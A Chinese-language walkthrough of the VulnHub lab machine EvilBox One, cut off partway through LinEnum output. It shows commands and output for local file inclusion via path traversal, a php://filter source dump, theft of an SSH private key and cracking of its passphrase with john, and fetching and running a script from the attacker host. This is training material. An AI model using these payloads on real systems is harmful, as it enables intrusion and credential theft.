EvilBox One
NMAP 扫描
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 02:01 EDT
Nmap scan report for bogon (192.168.56.103)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3A:ED:42 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
信息收集
从NMAP扫描结果来看,目标主机仅运行两种服务SSH以及HTTP,而该版本的SSH服务没有漏洞给可以利用,因此信息收集围绕着HTTP服务进行
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
background-color: #D8DBE2;
font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}
div.main_page {
position: relative;
display: table;
width: 800px;
margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;
border-width: 2px;
border-color: #212738;
border-style: solid;
background-color: #FFFFFF;
text-align: center;
}
div.page_header {
height: 99px;
width: 100%;
background-color: #F5F6F7;
}
div.page_header span {
margin: 15px 0px 0px 50px;
font-size: 180%;
font-weight: bold;
}
div.page_header img {
margin: 3px 0px 0px 40px;
border: 0px 0px 0px;
}
div.table_of_contents {
clear: left;
min-width: 200px;
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.table_of_contents_item {
clear: left;
width: 100%;
margin: 4px 0px 0px 0px;
background-color: #FFFFFF;
color: #000000;
text-align: left;
}
div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}
div.content_section {
margin: 3px 3px 3px 3px;
background-color: #FFFFFF;
text-align: left;
}
div.content_section_text {
padding: 4px 8px 4px 8px;
color: #000000;
font-size: 100%;
}
div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;
border-width: 1px;
border-style: dotted;
border-color: #000000;
background-color: #F5F6F7;
font-style: italic;
}
div.content_section_text p {
margin-bottom: 6px;
}
div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}
div.section_header {
padding: 3px 6px 3px 6px;
background-color: #8E9CB2;
color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}
div.section_header_red {
background-color: #CD214F;
}
div.section_header_grey {
background-color: #9F9386;
}
.floating_element {
position: relative;
float: left;
}
div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}
div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}
div.table_of_contents_item a:hover {
background-color: #000000;
color: #FFFFFF;
}
div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;
color: #000000;
}
div.content_section_text a:hover {
background-color: #000000;
color: #DCDFE6;
}
div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">
<img src="/icons/openlogo-75.png" alt="Debian Logo" class="floating_element"/>
<span class="floating_element">
Apache2 Debian Default Page
</span>
</div>
<!-- <div class="table_of_contents floating_element">
<div class="section_header section_header_grey">
TABLE OF CONTENTS
</div>
<div class="table_of_contents_item floating_element">
<a href="#about">About</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#changes">Changes</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#scope">Scope</a>
</div>
<div class="table_of_contents_item floating_element">
<a href="#files">Config files</a>
</div>
</div>
-->
<div class="content_section floating_element">
<div class="section_header section_header_red">
<div id="about"></div>
It works!
</div>
<div class="content_section_text">
<p>
This is the default welcome page used to test the correct
operation of the Apache2 server after installation on Debian systems.
If you can read this page, it means that the Apache HTTP server installed at
this site is working properly. You should <b>replace this file</b> (located at
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.
</p>
<p>
If you are a normal user of this web site and don't know what this page is
about, this probably means that the site is currently unavailable due to
maintenance.
If the problem persists, please contact the site's administrator.
</p>
</div>
<div class="section_header">
<div id="changes"></div>
Configuration Overview
</div>
<div class="content_section_text">
<p>
Debian's Apache2 default configuration is different from the
upstream default configuration, and split into several files optimized for
interaction with Debian tools. The configuration system is
<b>fully documented in
/usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full
documentation. Documentation for the web server itself can be
found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt>
package was installed on this server.
</p>
<p>
The configuration layout for an Apache2 web server installation on Debian systems is as follows:
</p>
<pre>
/etc/apache2/
|-- apache2.conf
| `-- ports.conf
|-- mods-enabled
| |-- *.load
| `-- *.conf
|-- conf-enabled
| `-- *.conf
|-- sites-enabled
| `-- *.conf
</pre>
<ul>
<li>
<tt>apache2.conf</tt> is the main configuration
file. It puts the pieces together by including all remaining configuration
files when starting up the web server.
</li>
<li>
<tt>ports.conf</tt> is always included from the
main configuration file. It is used to determine the listening ports for
incoming connections, and this file can be customized anytime.
</li>
<li>
Configuration files in the <tt>mods-enabled/</tt>,
<tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
particular configuration snippets which manage modules, global configuration
fragments, or virtual host configurations, respectively.
</li>
<li>
They are activated by symlinking available
configuration files from their respective
*-available/ counterparts. These should be managed
by using our helpers
<tt>
a2enmod,
a2dismod,
</tt>
<tt>
a2ensite,
a2dissite,
</tt>
and
<tt>
a2enconf,
a2disconf
</tt>. See their respective man pages for detailed information.
</li>
<li>
The binary is called apache2. Due to the use of
environment variables, in the default configuration, apache2 needs to be
started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
<b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the
default configuration.
</li>
</ul>
</div>
<div class="section_header">
<div id="docroot"></div>
Document Roots
</div>
<div class="content_section_text">
<p>
By default, Debian does not allow access through the web browser to
<em>any</em> file apart of those located in <tt>/var/www</tt>,
<a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a>
directories (when enabled) and <tt>/usr/share</tt> (for web
applications). If your site is using a web document root
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
document root directory in <tt>/etc/apache2/apache2.conf</tt>.
</p>
<p>
The default Debian document root is <tt>/var/www/html</tt>. You
can make your own virtual hosts under /var/www. This is different
to previous releases which provides better security out of the box.
</p>
</div>
<div class="section_header">
<div id="bugs"></div>
Reporting Problems
</div>
<div class="content_section_text">
<p>
Please use the <tt>reportbug</tt> tool to report bugs in the
Apache2 package with Debian. However, check <a
href="http://bugs.debian.org/cgi-bin/pkgreport.cgi?ordering=normal;archive=0;src=apache2;repeatmerged=0"
rel="nofollow">existing bug reports</a> before reporting a new bug.
</p>
<p>
Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself.
</p>
</div>
</div>
</div>
<div class="validator">
</div>
</body>
</html>
返回的是默认页面,并且其页面源代码没有可以利用的信息。
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/robots.txt
Hello H4x0r
H4x0r应该是用户名或者目录?目前还不清楚,接下来先扫描一下有无其他目录或者文件
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ gobuster dir -u http://192.168.56.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/25 02:07:22 Starting gobuster in directory enumeration mode
===============================================================
/secret (Status: 301) [Size: 317] [--> http://192.168.56.103/secret/]
/server-status (Status: 403) [Size: 279]
===============================================================
2022/10/25 02:07:58 Finished
===============================================================
利用gobuster工具扫描目标主机发现了/secret以及/server-status目录
──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.103/secret/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.103 Port 80</address>
</body></html>
/secret目录有意思,访问该目录,发现返回是空白,应该该目录下有感兴趣的文件,继续扫描:
─$ gobuster dir -u http://192.168.56.103/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z -x .php,.txt,.html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,html,php
[+] Timeout: 10s
===============================================================
2022/10/25 02:12:26 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4]
/evil.php (Status: 200) [Size: 0]
发现了evil.php文件,访问该文件是空白的,接下来应该看一下是否会有什么参数?
──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ wfuzz -c -u 'http://192.168.56.103/secret/evil.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.103/secret/evil.php?FUZZ=test
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 22.99640
Processed Requests: 20476
Filtered Requests: 20476
Requests/sec.: 890.3999
没有结果,修改test为/etc/passwd,继续FUZZ
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ wfuzz -c -u 'http://192.168.56.103/secret/evil.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.103/secret/evil.php?FUZZ=../../../../../../etc/passwd
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 26 L 38 W 1398 Ch "command"
Total time: 0
Processed Requests: 20476
Filtered Requests: 20475
Requests/sec.: 0
惊喜!挖掘出来参数名称为command,验证一下啊
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret/evil.php?command=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
得到了用户名mowree
接下来利用php filter得到evil.php的源代码
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==" | base64 -d
<?php
$filename = $_GET['command'];
include($filename);
?>
得到了用户名,看能否利用LFI漏洞(本地文件包含漏洞)查看是否有该用户的私钥,如果有,将其下载到攻击机本地。
──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ curl http://192.168.56.103/secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1743 100 1743 0 0 275k 0 --:--:-- --:--:-- --:--:-- 283k
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ls
id_rsa nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
成功拿到该用户的私钥文件
获取用户的Access
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
该私钥文件有口令保护,需要利用John工具破解该口令
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ john hashes --wordlist /usr/share/wordlists/rockyou.txt
Warning: only loading hashes of type "SSH", but also saw type "tripcode"
Use the "--format=tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "SSH", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "SSH", but also saw type "pix-md5"
Use the "--format=plaintext" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2022-10-25 02:40) 33.33g/s 23466p/s 23466c/s 23466C/s surfer..unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
成功破解了私钥文件的口令: unicorn
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
提权
将linenum.sh脚本上传至目标主机,并执行
─(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ cp ~/Tools/linenum/LinEnum.sh .
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ ls
hashes id_rsa LinEnum.sh nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ mv LinEnum.sh shell.sh
┌──(kali㉿kali)-[~/Vulnhub/evilbox]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
mowree@EvilBoxOne:/tmp$ wget http://192.168.56.101:8000/shell.sh
--2022-10-25 08:46:26-- http://192.168.56.101:8000/shell.sh
Conectando con 192.168.56.101:8000... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 46631 (46K) [text/x-sh]
Grabando a: “shell.sh”
shell.sh 100%[================>] 45,54K --.-KB/s en 0s
2022-10-25 08:46:26 (229 MB/s) - “shell.sh” guardado [46631/46631]
mowree@EvilBoxOne:/tmp$ chmod +x shell.sh
mowree@EvilBoxOne:/tmp$ ./shell.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
mar oct 25 08:46:37 CEST 2022
### SYSTEM ##############################################
[-] Kernel information:
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.19.0-17-amd64 ([email protected]) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.194-3 (2021-07-18)
[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
[-] Hostname:
EvilBoxOne
### USER/GROUP ##########################################
[-] Current user/group info:
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
[-] Users that have previously logged onto the system:
Nombre Puerto De Último
root tty1 lun ago 16 13:12:28 +0200 2021
daemon **Nunca ha accedido**
bin **Nunca ha accedido**
sys **Nunca ha accedido**
sync **Nunca ha accedido**
games **Nunca ha accedido**
man **Nunca ha accedido**
lp **Nunca ha accedido**
mail **Nunca ha accedido**
news **Nunca ha accedido**
uucp **Nunca ha accedido**
proxy **Nunca ha accedido**
www-data **Nunca ha accedido**
backup **Nunca ha accedido**
list **Nunca ha accedido**
irc **Nunca ha accedido**
gnats **Nunca ha accedido**
nobody **Nunca ha accedido**
_apt **Nunca ha accedido**
systemd-timesync **Nunca ha accedido**
systemd-network **Nunca ha accedido**
systemd-resolve **Nunca ha accedido**
messagebus **Nunca ha accedido**
sshd **Nunca ha accedido**
mowree pts/0 192.168.56.101 mar oct 25 08:42:13 +0200 2022
systemd-coredump **Nunca ha accedido**
[-] Who else is logged on:
08:46:37 up 47 min, 1 user, load average: 0,00, 0,00, 0,15
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mowree pts/0 192.168.56.101 08:42 4.00s 0.05s 0.00s /bin/bash ./shell.sh
[-] Group memberships:
uid=0(root) gid=0(root) grupos=0(root)
uid=1(daemon) gid=1(daemon) grupos=1(daemon)
uid=2(bin) gid=2(bin) grupos=2(bin)
uid=3(sys) gid=3(sys) grupos=3(sys)
uid=4(sync) gid=65534(nogroup) grupos=65534(nogroup)
uid=5(games) gid=60(games) grupos=60(games)
uid=6(man) gid=12(man) grupos=12(man)
uid=7(lp) gid=7(lp) grupos=7(lp)
uid=8(mail) gid=8(mail) grupos=8(mail)
uid=9(news) gid=9(news) grupos=9(news)
uid=10(uucp) gid=10(uucp) grupos=10(uucp)
uid=13(proxy) gid=13(proxy) grupos=13(proxy)
uid=33(www-data) gid=33(www-data) grupos=33(www-data)
uid=34(backup) gid=34(backup) grupos=34(backup)
uid=38(list) gid=38(list) grupos=38(list)
uid=39(irc) gid=39(irc) grupos=39(irc)
uid=41(gnats) gid=41(gnats) grupos=41(gnats)
uid=65534(nobody) gid=65534(nogroup) grupos=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) grupos=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) grupos=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) grupos=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) grupos=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) grupos=110(messagebus)
uid=105(sshd) gid=65534(nogroup) grupos=65534(nogroup)
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) grupos=999(systemd-coredump)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
[-] Super user account(s):
root
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4,0K ago 16 2021 .
drwxr-xr-x 18 root root 4,0K ago 16 2021 ..
drwxr-xr-x 4 mowree mowree 4,0K ago 16 2021 mowree
### ENVIRONMENTAL #######################################
[-] Environment information:
SHELL=/bin/bash
PWD=/tmp
LOGNAME=mowree
XDG_SESSION_TYPE=tty
HOME=/home/mowree
LANG=es_ES.UTF-8
SSH_CONNECTION=192.168.56.101 51542 192.168.56.103 22
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=mowree
SHLVL=1
XDG_SESSION_ID=4
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.56.101 51542 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
MAIL=/var/mail/mowree
SSH_TTY=/dev/pts/0
OLDPWD=/home/mowree
_=/usr/bin/env
[-] Path information:
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
lrwxrwxrwx 1 root root 7 ago 16 2021 /bin -> usr/bin
drwxr-xr-x 2 root root 20480 ago 16 2021 /usr/bin
drwxr-xr-x 2 root root 4096 ene 30 2021 /usr/games
drwxr-xr-x 2 root root 4096 ago 16 2021 /usr/local/bin
drwxr-xr-x 2 root root 4096 ago 16 2021 /usr/local/games
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
[-] Current umask value:
0022
u=rwx,g=rx,o=rx
[-] umask value as specified in /etc/login.defs:
UMASK 022
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 1042 oct 11 2019 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rw-r--r-- 1 root root 712 dic 17 2018 php
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.daily:
total 40
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rwxr-xr-x 1 root root 539 ago 8 2020 apache2
